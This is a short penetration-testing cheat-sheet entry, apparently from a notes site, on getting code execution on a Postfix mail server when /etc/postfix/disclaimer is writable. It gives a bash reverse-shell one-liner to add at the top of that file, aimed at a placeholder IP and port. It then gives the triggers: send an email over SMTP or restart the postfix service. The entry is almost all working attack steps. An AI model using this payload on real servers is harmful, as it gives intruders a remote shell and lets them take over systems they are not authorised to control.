postfix smtp
Shellsock
/etc/postfix/disclaimer RCE
REQUIREMENT: /etc/postfix/disclaimer
needs to writable
# add shell to top of file
bash -i >& /dev/tcp/IP/PORT 0>&1
# invoke
send email via smtp
[OR] service postfix restart
Last updated
Was this helpful?